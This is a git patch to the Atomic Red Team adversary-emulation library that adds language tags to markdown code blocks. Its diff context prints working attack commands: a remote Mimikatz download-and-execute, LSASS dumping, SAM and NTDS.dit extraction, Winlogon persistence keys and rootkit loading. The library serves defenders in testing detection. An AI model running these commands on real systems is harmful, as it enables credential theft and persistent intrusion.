From 6ec7d4bcf0a34ae03ae58704d125f3db42d4d9bb Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 16 Mar 2020 08:46:25 -0600 Subject: [PATCH] Specify language for markdown code blocks (#882) * specify code block type in markdown * specify code block type in markdown --- atomic_red_team/atomic_doc_template.md.erb | 21 +- atomics/T1002/T1002.md | 45 +- atomics/T1003/T1003.md | 145 +- atomics/T1004/T1004.md | 18 +- atomics/T1005/T1005.md | 4 +- atomics/T1007/T1007.md | 10 +- atomics/T1009/T1009.md | 4 +- atomics/T1010/T1010.md | 11 +- atomics/T1012/T1012.md | 4 +- atomics/T1014/T1014.md | 12 +- atomics/T1015/T1015.md | 6 +- atomics/T1016/T1016.md | 27 +- atomics/T1018/T1018.md | 32 +- atomics/T1022/T1022.md | 23 +- atomics/T1023/T1023.md | 10 +- atomics/T1027/T1027.md | 14 +- atomics/T1028/T1028.md | 20 +- atomics/T1030/T1030.md | 4 +- atomics/T1031/T1031.md | 6 +- atomics/T1032/T1032.md | 4 +- atomics/T1033/T1033.md | 8 +- atomics/T1035/T1035.md | 13 +- atomics/T1036/T1036.md | 51 +- atomics/T1037/T1037.md | 30 +- atomics/T1038/T1038.md | 6 +- atomics/T1040/T1040.md | 16 +- atomics/T1042/T1042.md | 4 +- atomics/T1044/T1044.md | 4 +- atomics/T1046/T1046.md | 8 +- atomics/T1047/T1047.md | 24 +- atomics/T1048/T1048.md | 12 +- atomics/T1049/T1049.md | 12 +- atomics/T1050/T1050.md | 22 +- atomics/T1053/T1053.md | 22 +- atomics/T1055/T1055.md | 31 +- atomics/T1056/T1056.md | 6 +- atomics/T1057/T1057.md | 8 +- atomics/T1058/T1058.md | 4 +- atomics/T1059/T1059.md | 4 +- atomics/T1060/T1060.md | 18 +- atomics/T1062/T1062.md | 4 +- atomics/T1063/T1063.md | 20 +- atomics/T1064/T1064.md | 10 +- atomics/T1065/T1065.md | 8 +- atomics/T1069/T1069.md | 16 +- atomics/T1070/T1070.md | 30 +- atomics/T1071/T1071.md | 34 +- atomics/T1073/T1073.md | 6 +- atomics/T1074/T1074.md | 14 +- atomics/T1075/T1075.md | 13 +- atomics/T1076/T1076.md | 15 +- atomics/T1077/T1077.md | 16 +- atomics/T1081/T1081.md | 16 +- atomics/T1082/T1082.md | 32 +- atomics/T1083/T1083.md | 16 +- atomics/T1084/T1084.md | 6 +- atomics/T1085/T1085.md | 44 +- atomics/T1086/T1086.md | 66 +- atomics/T1087/T1087.md | 44 +- atomics/T1088/T1088.md | 36 +- atomics/T1089/T1089.md | 116 +- atomics/T1090/T1090.md | 12 +- atomics/T1093/T1093.md | 6 +- atomics/T1095/T1095.md | 17 +- atomics/T1096/T1096.md | 10 +- atomics/T1097/T1097.md | 4 +- atomics/T1098/T1098.md | 4 +- atomics/T1099/T1099.md | 28 +- atomics/T1100/T1100.md | 11 +- atomics/T1101/T1101.md | 4 +- atomics/T1102/T1102.md | 12 +- atomics/T1103/T1103.md | 4 +- atomics/T1105/T1105.md | 46 +- atomics/T1107/T1107.md | 56 +- atomics/T1110/T1110.md | 4 +- atomics/T1112/T1112.md | 40 +- atomics/T1113/T1113.md | 16 +- atomics/T1114/T1114.md | 6 +- atomics/T1115/T1115.md | 10 +- atomics/T1117/T1117.md | 22 +- atomics/T1118/T1118.md | 88 +- atomics/T1119/T1119.md | 20 +- atomics/T1121/T1121.md | 16 +- atomics/T1123/T1123.md | 4 +- atomics/T1124/T1124.md | 8 +- atomics/T1126/T1126.md | 12 +- atomics/T1127/T1127.md | 9 +- atomics/T1128/T1128.md | 4 +- atomics/T1130/T1130.md | 4 +- atomics/T1132/T1132.md | 4 +- atomics/T1134/T1134.md | 4 +- atomics/T1135/T1135.md | 16 +- atomics/T1136/T1136.md | 30 +- atomics/T1138/T1138.md | 21 +- atomics/T1139/T1139.md | 4 +- atomics/T1140/T1140.md | 12 +- atomics/T1141/T1141.md | 8 +- atomics/T1142/T1142.md | 4 +- atomics/T1143/T1143.md | 4 +- atomics/T1144/T1144.md | 4 +- atomics/T1145/T1145.md | 18 +- atomics/T1146/T1146.md | 24 +- atomics/T1147/T1147.md | 4 +- atomics/T1148/T1148.md | 4 +- atomics/T1152/T1152.md | 4 +- atomics/T1153/T1153.md | 8 +- atomics/T1154/T1154.md | 4 +- atomics/T1155/T1155.md | 4 +- atomics/T1156/T1156.md | 8 +- atomics/T1158/T1158.md | 52 +- atomics/T1163/T1163.md | 4 +- atomics/T1164/T1164.md | 4 +- atomics/T1165/T1165.md | 6 +- atomics/T1166/T1166.md | 18 +- atomics/T1168/T1168.md | 8 +- atomics/T1169/T1169.md | 4 +- atomics/T1170/T1170.md | 18 +- atomics/T1173/T1173.md | 4 +- atomics/T1174/T1174.md | 9 +- atomics/T1179/T1179.md | 9 +- atomics/T1180/T1180.md | 4 +- atomics/T1183/T1183.md | 12 +- atomics/T1191/T1191.md | 18 +- atomics/T1193/T1193.md | 4 +- atomics/T1196/T1196.md | 9 +- atomics/T1197/T1197.md | 16 +- atomics/T1201/T1201.md | 38 +- atomics/T1202/T1202.md | 8 +- atomics/T1204/T1204.md | 33 +- atomics/T1206/T1206.md | 8 +- atomics/T1208/T1208.md | 4 +- atomics/T1214/T1214.md | 8 +- atomics/T1215/T1215.md | 6 +- atomics/T1216/T1216.md | 14 +- atomics/T1217/T1217.md | 20 +- atomics/T1218/T1218.md | 62 +- atomics/T1219/T1219.md | 4 +- atomics/T1220/T1220.md | 30 +- atomics/T1222/T1222.md | 64 +- atomics/T1223/T1223.md | 13 +- atomics/T1482/T1482.md | 12 +- atomics/T1485/T1485.md | 31 +- atomics/T1489/T1489.md | 16 +- atomics/T1490/T1490.md | 20 +- atomics/T1496/T1496.md | 4 +- atomics/T1500/T1500.md | 11 +- atomics/T1501/T1501.md | 6 +- atomics/T1502/T1502.md | 11 +- atomics/T1504/T1504.md | 6 +- atomics/T1505/T1505.md | 11 +- atomics/T1518/T1518.md | 8 +- atomics/T1519/T1519.md | 6 +- atomics/T1529/T1529.md | 36 +- atomics/T1531/T1531.md | 20 +- atomics/index.yaml | 1844 ++++++++++---------- 155 files changed, 2784 insertions(+), 1720 deletions(-) diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb index 834f742b..0ce1c6c6 100644 --- a/atomic_red_team/atomic_doc_template.md.erb +++ b/atomic_red_team/atomic_doc_template.md.erb @@ -41,28 +41,39 @@ end.join(', ') %> #### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%> -``` +<%def get_language(executor) + language = executor + if executor == "command_prompt" + language = "cmd" + elsif executor == "manual" + language = "" + end + language +end%> + +```<%= get_language(test['executor']['name']) %> <%= test['executor']['command'].to_s.strip %> ``` <%- end -%> <%- if test['executor']['cleanup_command'] != nil -%> #### Cleanup Commands: -``` +```<%= get_language(test['executor']['name']) %> <%= test['executor']['cleanup_command'].to_s.strip %> ``` <%- end -%> <% if test['dependencies'].to_a.count > 0 %> -#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`! +<% dependency_executor = test['executor']['name'] %> +#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`! <% test['dependencies'].each do | dep | -%> ##### Description: <%= dep['description'].strip! %> ##### Check Prereq Commands: -``` +```<%= get_language(dependency_executor) %> <%= dep['prereq_command'].strip! %> ``` ##### Get Prereq Commands: -``` +```<%= get_language(dependency_executor) %> <%= dep['get_prereq_command'].strip! %> ``` <% end -%> diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index 58011709..e8e428eb 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md @@ -31,12 +31,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `powershell`! -``` + + +```powershell dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ``` #### Cleanup Commands: -``` +```powershell Remove-Item -path #{output_file} -ErrorAction Ignore ``` @@ -64,24 +66,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd "#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension} ``` #### Cleanup Commands: -``` +```cmd del /f /q /s #{output_file} >nul 2>&1 ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Rar tool must be installed at specified location (#{rar_exe}) ##### Check Prereq Commands: -``` +```cmd if not exist "#{rar_exe}" (exit /b 1) ``` ##### Get Prereq Commands: -``` +```cmd echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} echo Follow the installer prompts to install Winrar @@ -108,24 +113,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `sh`! -``` + + +```sh zip #{output_file} #{input_files} ``` #### Cleanup Commands: -``` +```sh rm -f #{output_file} ``` + #### Dependencies: Run with `sh`! ##### Description: Files to zip must exist (#{input_files}) ##### Check Prereq Commands: -``` +```sh ls #{input_files} ``` ##### Get Prereq Commands: -``` +```sh echo Please set input_files argument to include files that exist ``` @@ -149,12 +157,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `sh`! -``` + + +```sh test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file}) ``` #### Cleanup Commands: -``` +```sh rm -f #{input_file}.gz ``` @@ -179,24 +189,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri #### Attack Commands: Run with `sh`! -``` + + +```sh tar -cvzf #{output_file} #{input_file_folder} ``` #### Cleanup Commands: -``` +```sh rm -f #{output_file} ``` + #### Dependencies: Run with `sh`! ##### Description: Folder to zip must exist (#{input_file_folder}) ##### Check Prereq Commands: -``` +```sh test -e #{input_file_folder} ``` ##### Get Prereq Commands: -``` +```sh echo Please set input_file_folder argument to a folder that exists ``` diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 597255fc..73280a50 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -179,7 +179,9 @@ Dumps credentials from memory via Powershell by invoking a remote mimikatz scrip #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ``` @@ -206,20 +208,23 @@ Dump credentials from memory using Gsecdump #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{gsecdump_exe} -a ``` + #### Dependencies: Run with `powershell`! ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){ @@ -249,20 +254,23 @@ Dump credentials from memory using Windows Credential Editor from https://www.am #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{wce_exe} -o #{output_file} ``` + #### Dependencies: Run with `powershell`! ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ @@ -287,14 +295,16 @@ via three registry keys. Then processed locally using https://github.com/Neohaps #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg save HKLM\sam %temp%\sam reg save HKLM\system %temp%\system reg save HKLM\security %temp%\security ``` #### Cleanup Commands: -``` +```cmd del %temp%\sam >nul 2> nul del %temp%\system >nul 2> nul del %temp%\security >nul 2> nul @@ -322,24 +332,27 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{procdump_exe} -accepteula -ma lsass.exe #{output_file} ``` #### Cleanup Commands: -``` +```cmd del "#{output_file}" >nul 2> nul ``` + #### Dependencies: Run with `powershell`! ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null @@ -395,20 +408,23 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd #{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit ``` + #### Dependencies: Run with `powershell`! ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null @@ -416,11 +432,11 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force ``` ##### Description: Lsass dump must exist at specified location (#{input_file}) ##### Check Prereq Commands: -``` +```powershell cmd /c "if not exist #{input_file} (exit /b 1)" ``` ##### Get Prereq Commands: -``` +```powershell Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" ``` @@ -445,20 +461,23 @@ subsequent domain controllers without the need of network-based replication. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: -``` +```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: -``` +```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` @@ -481,20 +500,23 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd vssadmin.exe create shadow /for=#{drive_letter} ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: -``` +```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: -``` +```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` @@ -522,46 +544,49 @@ This test must be executed on a Windows Domain Controller. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE ``` #### Cleanup Commands: -``` +```cmd del "#{extract_path}\ntds.dit" >nul 2> nul del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: -``` +```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: -``` +```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` ##### Description: Volume shadow copy must exist ##### Check Prereq Commands: -``` +```cmd if not exist #{vsc_name} (exit /b 1) ``` ##### Get Prereq Commands: -``` +```cmd echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement ``` ##### Description: Extract path must exist ##### Check Prereq Commands: -``` +```cmd if not exist #{extract_path} (exit /b 1) ``` ##### Get Prereq Commands: -``` +```cmd mkdir #{extract_path} ``` @@ -579,20 +604,23 @@ Look for the encrypted cpassword value within Group Policy Preference files on t #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd findstr /S cpassword %logonserver%\sysvol\*.xml ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must be domain joined ##### Check Prereq Commands: -``` +```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Joining this computer to a domain must be done manually ``` @@ -616,31 +644,34 @@ Look for the encrypted cpassword value within Group Policy Preference files on t #### Attack Commands: Run with `powershell`! -``` + + +```powershell . #{gpp_script_path} Get-GPPPassword -Verbose ``` + #### Dependencies: Run with `powershell`! ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} ##### Check Prereq Commands: -``` +```powershell if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } ``` ##### Get Prereq Commands: -``` +```powershell New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" ``` ##### Description: Computer must be domain joined ##### Check Prereq Commands: -``` +```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Joining this computer to a domain must be done manually ``` @@ -659,38 +690,41 @@ Parses secrets hidden in the LSASS process with python. Similar to mimikatz's se #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd pypykatz live lsa ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -``` +```powershell if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "Python 3 must be installed manually" ``` ##### Description: Computer must have pip installed ##### Check Prereq Commands: -``` +```powershell if (pip3 -V) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "PIP must be installed manually" ``` ##### Description: pypykatz must be installed and part of PATH ##### Check Prereq Commands: -``` +```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell pip3 install pypykatz ``` @@ -708,38 +742,41 @@ Parses registry hives to obtain stored credentials #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd pypykatz live registry ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -``` +```powershell if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "Python 3 must be installed manually" ``` ##### Description: Computer must have pip installed ##### Check Prereq Commands: -``` +```powershell if (pip3 -V) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell echo "PIP must be installed manually" ``` ##### Description: pypykatz must be installed and part of PATH ##### Check Prereq Commands: -``` +```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell pip3 install pypykatz ``` diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md index 93014434..7529105f 100644 --- a/atomics/T1004/T1004.md +++ b/atomics/T1004/T1004.md @@ -34,12 +34,14 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore ``` @@ -63,12 +65,14 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore ``` @@ -92,13 +96,15 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md index 833aa76c..c1c5dd80 100644 --- a/atomics/T1005/T1005.md +++ b/atomics/T1005/T1005.md @@ -25,7 +25,9 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified #### Attack Commands: Run with `sh`! -``` + + +```sh cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" ``` diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index e1a79fdf..e78e03ba 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -19,7 +19,9 @@ Identify system services #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd tasklist.exe sc query sc query state= all @@ -46,12 +48,14 @@ Enumerates started system services using net.exe and writes them to a file. This #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net.exe start >> #{output_file} ``` #### Cleanup Commands: -``` +```cmd del /f /q /s #{output_file} >nul 2>&1 ``` diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md index f0a22977..3e1d9080 100644 --- a/atomics/T1009/T1009.md +++ b/atomics/T1009/T1009.md @@ -25,7 +25,9 @@ Uses dd to add a zero to the binary to change the hash #### Attack Commands: Run with `sh`! -``` + + +```sh dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} ``` diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index 52d3187c..98633e2c 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -25,25 +25,28 @@ Compiles and executes C# code to list main window titles associated with each pr #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} #{output_file_name} ``` #### Cleanup Commands: -``` +```cmd del /f /q /s #{output_file_name} >nul 2>&1 ``` + #### Dependencies: Run with `powershell`! ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" ``` diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 65f9c9f7..d663b351 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -30,7 +30,9 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_ #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 5b0ee20c..b6e73e15 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -28,7 +28,9 @@ Loadable Kernel Module based Rootkit #### Attack Commands: Run with `sh`! -``` + + +```sh sudo insmod #{rootkit_file} ``` @@ -53,7 +55,9 @@ Loadable Kernel Module based Rootkit #### Attack Commands: Run with `sh`! -``` + + +```sh sudo modprobe #{rootkit_file} ``` @@ -85,7 +89,9 @@ It would be wise if you only run this in a test environment #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd puppetstrings #{driver_path} ``` diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index 242b244d..ca1d7601 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -39,7 +39,9 @@ Attaches cmd.exe to a list of processes. Configure your own Input arguments to a #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" @@ -59,7 +61,7 @@ Foreach ($item in $input_table){ ``` #### Cleanup Commands: -``` +```powershell $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) { diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 34293e98..ae4904db 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -27,7 +27,9 @@ Identify network configuration information #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd ipconfig /all netsh interface show arp -a @@ -51,7 +53,9 @@ Enumerates Windows Firewall Rules using netsh. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd netsh advfirewall firewall show rule name=all ``` @@ -71,7 +75,9 @@ Identify network configuration information #### Attack Commands: Run with `sh`! -``` + + +```sh arp -a netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c ifconfig @@ -93,7 +99,9 @@ Identify network configuration information as seen by Trickbot and described her #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd ipconfig /all net config workstation net view /all /domain @@ -124,7 +132,9 @@ https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-wi #### Attack Commands: Run with `powershell`! -``` + + +```powershell $ports = Get-content #{port_file} $file = "#{output_file}" $totalopen = 0 @@ -154,19 +164,20 @@ Write-Host $results ``` #### Cleanup Commands: -``` +```powershell Remove-Item -ErrorAction ignore "#{output_file}" ``` + #### Dependencies: Run with `powershell`! ##### Description: Test requires #{port_file} to exist ##### Check Prereq Commands: -``` +```powershell if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" ``` diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 356369ff..e587ce77 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -48,7 +48,9 @@ Identify remote systems with net.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net view /domain net view ``` @@ -69,7 +71,9 @@ Identify remote systems with net.exe querying the Active Directory Domain Comput #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net group "Domain Computers" /domain ``` @@ -94,7 +98,9 @@ Identify domain controllers for specified domain. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd nltest.exe /dclist:#{target_domain} ``` @@ -114,7 +120,9 @@ Identify remote systems via ping sweep #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i ``` @@ -134,7 +142,9 @@ Identify remote systems via arp #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd arp -a ``` @@ -154,7 +164,9 @@ Identify remote systems via arp #### Attack Commands: Run with `sh`! -``` + + +```sh arp -a | grep -v '^?' ``` @@ -174,7 +186,9 @@ Identify remote systems via ping sweep #### Attack Commands: Run with `sh`! -``` + + +```sh for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done ``` @@ -194,7 +208,9 @@ Powershell script that runs nslookup on cmd.exe against the local /24 network of #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] $pieces = $localip.split(".") $firstOctet = $pieces[0] diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index 0961be6a..2665c4db 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -25,7 +25,9 @@ Encrypt data for exiltration #### Attack Commands: Run with `sh`! -``` + + +```sh mkdir /tmp/victim-files cd /tmp/victim-files touch a b c d e f g @@ -38,7 